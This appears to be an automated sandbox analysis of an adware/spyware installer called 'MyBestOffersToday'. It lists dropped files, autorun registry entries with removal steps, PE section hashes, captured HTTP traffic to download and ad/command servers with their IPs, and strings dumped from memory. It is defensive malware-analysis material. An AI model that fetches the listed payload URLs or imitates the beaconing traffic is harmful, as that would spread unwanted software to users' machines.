%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mbot_ca_014010265.exe (20237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mybestofferstoday_widget.exe (16649 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\predm.exe (3300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mbot_ca_014010265.7z (8657 bytes)
%Program Files%\mbot_ca_014010265\is-OP7DE.tmp (28787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-HE4TJ.tmp (4185 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MYBESTOFFERSTODAY\MyBestOffersToday.lnk (837 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-HT75P.tmp (7971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-LGPBB.tmp (7433 bytes)
%Program Files%\mbot_ca_014010265\unins000.dat (35465 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\upmbot_ca_014010265.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-61C0M.tmp (8657 bytes)
%Program Files%\mbot_ca_014010265\mbot_ca_014010265.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\idp.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-6DL8S.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mybestofferstoday_widget.7z (7971 bytes)
%Program Files%\mbot_ca_014010265\mybestofferstoday_widget.exe (23404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\predm.7z (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\ex.bat (1564 bytes)
%Program Files%\mbot_ca_014010265\predm.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5BNLS.tmp\setup.tmp (6319 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upmbot_ca_014010265.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.exe -runhelper"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"mbot_ca_014010265" = "%Program Files%\mbot_ca_014010265\mbot_ca_014010265.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name: MyBestOffersToday
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description: MyBestOffersToday Setup
Comments: This installation was built with Inno Setup.
Language: Language Neutral
Company Name: Product Name: MyBestOffersToday Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: File Description: MyBestOffersToday Setup Comments: This installation was built with Inno Setup.Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 40240 | 40448 | 4.59679 | c3bd95c4b1a8e5199981e0d9b45fd18c |
DATA | 45056 | 592 | 1024 | 1.90742 | 1ee71d84f1c77af85f1f5c278f880572 |
BSS | 49152 | 3724 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 53248 | 2384 | 2560 | 3.07115 | bb5485bf968b970e5ea81292af2acdba |
.tls | 57344 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 61440 | 24 | 512 | 0.14174 | 9ba824905bf9c7922b6fc87a38b74366 |
.reloc | 65536 | 2244 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 69632 | 11264 | 11264 | 3.14703 | 86384a97e0453cb56499ecc334d6f61b |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 163
2b7b7a52efe8396b0216f4a05260ef2d
9d284e9fed9955f910eef1ae7287159d
2f9e864b52474c400bd02edce6a5810a
5932f9c130120565222b600225023e41
7059a51294e236d4fc52cd0e424241bf
4bfd0d9d96cea895041cdf4b1e654631
66b59b5cb4eb3b9f42fb05d650abf687
956c81b158d392a57c94cc58b1d9b96b
c84ece819a6175620d08eacc6851084d
2331123d3fc0308c0bc5c576566ded63
aae70780f303d40607f55afe6c40671d
e5996e0b5bdeae2492661b82c41ed663
c5ea6329994c08a6947bc53a8d7f468c
9e3305071b41c395fa799af6533f7a9c
610ed4fbad849e51346d035c8f0af609
db7804c6c3b9bddaee87754eeb036518
be41f2a70019f8d54dbf1f3ad7c6f76d
53e82bc5fee2ad1a1f2751287d719811
f70c244a1965e12409fcced19c0f23da
a10d93a8f5ecb7a4affff17751521a6d
d8478b37b2f855b5435090b481cbdf0c
1a2c205f9b6a6905620d3c462c7babc8
253c1c04e27a5fe49c4dabaefe94773a
c41947ad52f30f0423cbd088be9956a1
242b1a149e8945fe47933f0c677afff0
Network Activity
URLs
URL | IP |
---|---|
hxxp://dl.tuto4pc.com/download/trasgo/amonetize/ca/setup_mbot_ca.exe | |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US | 37.187.146.33 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=255559&tag=CA_AMONETIZE_INSTALL_INI | 188.165.231.87 |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi | 37.187.146.33 |
hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc | 37.187.152.38 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=255559&tag=CA_AMONETIZE_INSTALL_F11 | 188.165.231.87 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=255559&tag=CA_AMONETIZE_INSTALL_FIN | 188.165.231.87 |
hxxp://dl.tcoupichou.eu/download/trasgo/amonetize/ca/setup_mbot_ca.exe | 188.165.230.78 |
hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi | 37.187.148.123 |
upd.adskyforever.com | 37.187.147.141 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=255559&tag=CA_AMONETIZE_INSTALL_FIN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:25 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sat, 12 Mar 16 21:12:00 GMT
Set-Cookie: _c4aid=220D4706AE854B09B81F07469B850CB9; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=220D4706AE854B09B81F07469B850CB9,1457817145.99322; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=regiedepub.com
GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1
User-Agent: mbot_ca_014010265-1.10
Host: ads.under-myscreen.be
Accept: */*
Accept-Encoding: gzip, deflate
Referer:
Cookie:
Accept-Language: en,en-US
X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
X-OS-Ver: 5.1.2.2600
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:23 GMT
Server: Apache/2.2.22 (Debian) mod_ssl/2.2.22 OpenSSL/1.0.1e mod_wsgi/3.3 Python/2.7.3 mod_perl/2.0.7 Perl/v5.14.2
X-C4PC-ServerName: ads.under-myscreen.be
Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=under-myscreen.be; path=/;
Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1457817143.84413; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=under-myscreen.be; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
34d..{"dids":{"90077":{"unmatch":["regiedepub.com|directrev.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"},{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"youtube|yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit"},{"u":0,"m":"xhamster|http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter"},{"u":0,"m":"xhamster"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"},{"u":0,"m":"ebay|xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"}]}},"freeze":3600,"refresh":3600,"version":118285}..0..
GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: prof.eorezo.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:18 GMT
Server: Apache/2.2.22
x-eorezo-crc32: -1
x-eorezo-crypted: 1
x-eorezo-length: 632
Set-Cookie: conftime=1457817138; expires=Thu, 06 Jul 16 14:58:00 GMT; domain=eorezo.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1457817138770161; path=/; expires=Mon, 11-Apr-16 21:12:18 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
358..Xg8nssf/4H10OdRv/PBlQCyF9RkAzpy/PPG8paJnu rCw3mAaqFpX2 ZKEgbMMA2htCshaMIPoMPkSppoNIfvqD ZyWxTIl1LyUx8yWjlHHNhn1WF5uF0H6qLM uZMwkTiGldZX5iSj uCsroOrbj/qdFgfbU9hmNOF2lZWiRA4D1nmKWD56o30N03aMe cM TaH0Zt8tkkpVIrV86sjShA2ibI4frmimtvqttCmZq2iOlFsKeYNJxrj/jP12cx2lA7NiBrk4PKXXug7tpKb65atNqDRlvUKKAF9c9zPzn4F2eh8GAfVbPOtZhSf/o/50RLSfemcISdhtiO8gTINReeSoYdUAqhmbrscZPjwnJCjKfgrUbQCV1J0DBwv2J mQsGJZQH4xDticU8Aw3zUoh3vFhu1Wg3CUqlkPjaoTHyfoXpQMPgXLOCXbzPycQALj/NcItWUUrMNRe kdxupcE1jN4IzWnf18j9K22lWOLNAxMrPXujOAPP62LFEXRprTnccE4UideNhUT6DZiskWqf r0XSAkp94qxjVd0han4yoYTsCe73I6nVdoolp8ZVRkkPBXhF4j0HnxGK7gNIlCPG9CPWv3omojAUMA/b1D0QyJmrJXkW4wDQZDG70ubUzvxaL8e7tIXGaOPoNaaawcsncgjizZ4iLzFWuT7SqAme snGMZyD25HDIX85w1NDBG/7j7KXONYkUsLgo0muKS18VS3O815AXMRvhUqrsNbIl14wyH2HdK2Y6rOdediRY/mUWwpxc4SIFGJvBzItOLGyenMOutfgI/PzuVUWr5spHZWUtnBhgucXvuMx85rof39lP/XE5KUbGoqL6Aeb3w==..0..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=255559&tag=CA_AMONETIZE_INSTALL_INI HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:18 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sat, 12 Mar 16 21:12:00 GMT
Set-Cookie: _c4aid=D3B79603FC7E4A9C8FB98F925370E2BE; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=D3B79603FC7E4A9C8FB98F925370E2BE,1457817138.92826; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 255559);......0..
POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 2055166265
x-spidermessenger-length: 275
Content-Type: text/*
User-Agent: mbot_ca_014010265-mbot_ca_014010265
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 382
Cache-Control: no-cache
ujXl2iaEv3+xg2nmk5XqjNFxudZ4eC/dyLKVClDHrgytgp9na1YznA1k2sbSq1rpblkEa9ZKaQ1Wwn4SmwElJXtSv7LRCE910ON1TEZkOpikVPs0NmG6pauUOoeVJSuD7bwT6xVPl/Q9wAnpz8090A7JYzEPa4dTn2lAvm4etvM/lgFyGw7qg5HsoRIQ5jkHm1Hj6TME+Z22i4XCGD7auQF8GDqKXkss9k7NBp99DMsAIWRpNtN4zLe9JkOz4rsIjlMqZxuWf+eZ1OGoqjLBfAMnuAoebFSON424/gL2okjLce3ejQZwj3JPlFBhztqC6fQ7XEPW+mE5ErzKDmOdJWdL4mIadPxmZkcP1P9WOKo=
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:23 GMT
Server: Apache/2.2.22
x-SPIDERMESSENGER-crypted: 2
x-SPIDERMESSENGER-length: 1983
x-SPIDERMESSENGER-crc32: -1
Set-Cookie: conftime=1457817143; expires=Thu, 06 Jul 16 14:59:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1457817143574585; path=/; expires=Mon, 11-Apr-16 21:12:23 GMT
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
a60..0NogVEVNeZU/g6fcxXpPm8L/TbLACp6qNZeGXV8m6ec/K8dk0/yY5pa2OZ8Vz3njZHd9v29yzT3I48VojCBBmA2s0/SxoZIOAAhT SK4vV7sDhBM0aTmg2 IVnRKydYHunoaf9pbRw2 G5ivu0QKWc3/l WPP1gNlgnspvbmqk4aS7ehZBwwMTOxZSE84DysrG8f3S hIgVSAINyXu9s UPJeM98UAjt6p7fBFT6zMtkh 3j1ETePa4NR6v5nTfw5XqoE1sK6iaLoC4VpThhXFImxqo8kWLg41HIXBDHRdF950YBd00yrMS//vftM2BgU2lwIGKjVkNlmY0QWivyhi c6FkNLk8qwrEs/rFNjOmDaAErIlj KNtqGnUkY e6D3O/1/I 8DpBydFoBJ91LdZab/WrBBbIHR0mgEkJTQoBXjm/T 2a3azIWpikcxx30rHKp0xFBPgCNjxJhe5w0Mo4JSA6v8dx n8bBc8fcjovYnaZwRkR7UwhT7Vghxy9eoX6xpvq6DDXUXVc8AdbR7pqgyB0IzeZHlMtG rwrTylkciy9hcS4rZSwcRo9g6KSHmtXVZb2lVLgiFX3oaPopPdfYG6vA0GJsxeq6zf7EIcicRfC4KZzM4J7Ro6YbwlJP6RUDNbYNqz6so6qAo0CMoZ6LbE1zBLIYOXmrFd9EwbmDZiOAZCl2GK/de/irxXmNOW5WoMLOeZ3Rxv3/uhb jSBoVDkznDGJCknuGV/kmP rrjbuI5qTWlAs34aUItH2qjEEeW1Jioq2puQuFKpKOrQTcG4TQZ9VPZlf8IuP qkA5lolo8h0g3BJrdVyPNGvrAHVEgE2lLNmk3L6cFd1kiGIF8A4VHdQ9FlhlrSUcb6rq9n1/NQsHwsUwialxOcXHmybteAi1KTH4d9lbKNXkBEUb6pBlo4S7/OccM0c4q5GjewekIcMqEUm0BoMPcBoJhM9EwnNgmTX IiF1psW05lxUOV50wzEAPZI63kEUwSrWEWXBaXClEF3/43Gi5QN3ek77Yng9Eu0TbbDwAIUDuBKXeF5NL5Xq5VPXPkAPREGqZnF9paybsZJK7DCapPWXLwNzYa5IGlsUC6MLp9ljxedAEFRvOgUMQXj0QfMe8eWGVGCCHFrwSsqDnx9FF/rqGAA6wYRUWllQ1lVJNtxiAVCY8/2o0N0llGnJ5VZOlKfUYdLL1Hg/OQnRYmqMtmdh28VLW/zYklZfD6aTL186Hz7h3LK2vj75hTKbiRdqpH6SFwzFNgku qd1pjmbmCU77SmPeYVNOfqjNczNaxagN0QnalCBBl/ghWP92SU2/zc4JjtDA6EHZR7/yoOOF/15s4Vr9woTzL/Wrjd F5uxawMNxDeZ7cJ2Nf0n8V12KzWu5TLcbRf UeSqwGY0UOROgcFo04bH/u271KjafRZeMcqbeL54nmcnslLnwN2dkc9Lbqzizf7OSp47lEM2phEkB1OREQxx6ZID364W8TaSNDd7cm6Qz2FlEIjo VGPybLrRefWQf CUsVF
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=255559&tag=CA_AMONETIZE_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:25 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sat, 12 Mar 16 21:12:00 GMT
Set-Cookie: _c4aid=0C846B3A5BF443AFB068F8F0503164D7; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=0C846B3A5BF443AFB068F8F0503164D7,1457817145.87228; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 255559);......0..
HEAD /download/trasgo/amonetize/ca/setup_mbot_ca.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.4
Host: dl.tcoupichou.eu
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:12 GMT
Server: Apache/2.2.16
Last-Modified: Sat, 12 Mar 2016 11:37:00 GMT
ETag: "2140379-5079c7-52dd8773e0344"
Accept-Ranges: bytes
Content-Length: 5274055
Keep-Alive: timeout=15, max=200
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET /download/trasgo/amonetize/ca/setup_mbot_ca.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.4
Host: dl.tcoupichou.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:12 GMT
Server: Apache/2.2.16
Last-Modified: Sat, 12 Mar 2016 11:37:00 GMT
ETag: "2140379-5079c7-52dd8773e0344"
Accept-Ranges: bytes
Content-Length: 5274055
Keep-Alive: timeout=15, max=200
Connection: Keep-Alive
Content-Type: application/x-msdos-program
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................P...................................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>
Map
The SpyTool connects to the servers at the folowing location(s):
Strings from Dumps
upmbot_ca_014010265.exe_1092:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
RSSSSSSh
RSSSSSSh
QSSh(,j
QSSh(,j
tFHt:Ht.Ht"Hu`
tFHt:Ht.Ht"Hu`
SSSSh
SSSSh
SSSShxno
SSSShxno
u$SShe
u$SShe
tWSShW
tWSShW
tl9_ tgSSh
tl9_ tgSSh
t'SShl
t'SShl
j%XtL9E
j%XtL9E
FtPW
FtPW
SSh@B
SSh@B
u.SSh
u.SSh
tsSSh
tsSSh
FTCP
FTCP
t.WWWSP
t.WWWSP
tAHt.HHt
tAHt.HHt
FTPS
FTPS
t.VhxPj
t.VhxPj
u)SShF
u)SShF
s%j.Zf
s%j.Zf
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
LookupPrivilegeValue error: %u
LookupPrivilegeValue error: %u
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ntdll.dll
ntdll.dll
RegSetKeySecurity error! (rc=%lu)
RegSetKeySecurity error! (rc=%lu)
Key not found.
Key not found.
Error opening key.
Error opening key.
%%X
%%X
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is not compiled with PCRE_UTF8 support
this version of PCRE is not compiled with PCRE_UTF8 support
PCRE does not support \L, \l, \N, \U, or \u
PCRE does not support \L, \l, \N, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
(*VERB) with an argument is not supported
(*VERB) with an argument is not supported
!"#$%&'((()* ,-./01
!"#$%&'((()* ,-./01
CNotSupportedException
CNotSupportedException
CCmdTarget
CCmdTarget
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
CFtpFileFind
CFtpFileFind
CHttpConnection
CHttpConnection
CFtpConnection
CFtpConnection
CHttpFile
CHttpFile
RegDeleteKeyExW
RegDeleteKeyExW
TaskDialogIndirect
TaskDialogIndirect
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
CMDIChildWndEx
CMDIFrameWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMDIClientAreaWnd
CHotKeyCtrl
CHotKeyCtrl
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
GetProcessWindowStation
operator
operator
portuguese-brazilian
portuguese-brazilian
qR.Rd
qR.Rd
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
Error %d: Could not begin update of %s
Error %d: Could not begin update of %s
Error %d: Updating resource
Error %d: Updating resource
!"#$%&'()* ,-./:;?@[\]^_`{|}~
!"#$%&'()* ,-./:;?@[\]^_`{|}~
E:\wizz\EOP - OFF\EOP - OFF\Release\temp.pdb
E:\wizz\EOP - OFF\EOP - OFF\Release\temp.pdb
IPHLPAPI.DLL
IPHLPAPI.DLL
PSAPI.DLL
PSAPI.DLL
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
SetWindowsHookExW
SetWindowsHookExW
CreateDialogIndirectParamW
CreateDialogIndirectParamW
UnhookWindowsHookEx
UnhookWindowsHookEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
GetAsyncKeyState
GetAsyncKeyState
MapVirtualKeyW
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
GetKeyNameTextW
GetKeyNameTextW
MapVirtualKeyExW
MapVirtualKeyExW
EnumChildWindows
EnumChildWindows
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
MSIMG32.dll
MSIMG32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegUnLoadKeyW
RegUnLoadKeyW
RegLoadKeyW
RegLoadKeyW
RegSetKeySecurity
RegSetKeySecurity
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyExW
RegCreateKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyW
RegEnumKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
UrlUnescapeW
UrlUnescapeW
SHLWAPI.dll
SHLWAPI.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
OLEACC.dll
OLEACC.dll
HttpQueryInfoW
HttpQueryInfoW
HttpSendRequestW
HttpSendRequestW
HttpOpenRequestW
HttpOpenRequestW
InternetCrackUrlW
InternetCrackUrlW
InternetCanonicalizeUrlW
InternetCanonicalizeUrlW
FtpDeleteFileW
FtpDeleteFileW
FtpRenameFileW
FtpRenameFileW
FtpCreateDirectoryW
FtpCreateDirectoryW
FtpRemoveDirectoryW
FtpRemoveDirectoryW
FtpSetCurrentDirectoryW
FtpSetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpPutFileW
FtpPutFileW
FtpGetFileW
FtpGetFileW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpEndRequestW
HttpEndRequestW
HttpSendRequestExW
HttpSendRequestExW
FtpOpenFileW
FtpOpenFileW
FtpCommandW
FtpCommandW
FtpFindFirstFileW
FtpFindFirstFileW
InternetOpenUrlW
InternetOpenUrlW
WININET.dll
WININET.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
IMM32.dll
IMM32.dll
WINMM.dll
WINMM.dll
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@
.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@
.PAVCFileException@@
.PAVCFileException@@
.PAVCInternetException@@
.PAVCInternetException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCException@@
.PAVCException@@
.PAVCObject@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.PAVCOleException@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCResourceException@@
.?AVCFtpFileFind@@
.?AVCFtpFileFind@@
.?AVCFtpConnection@@
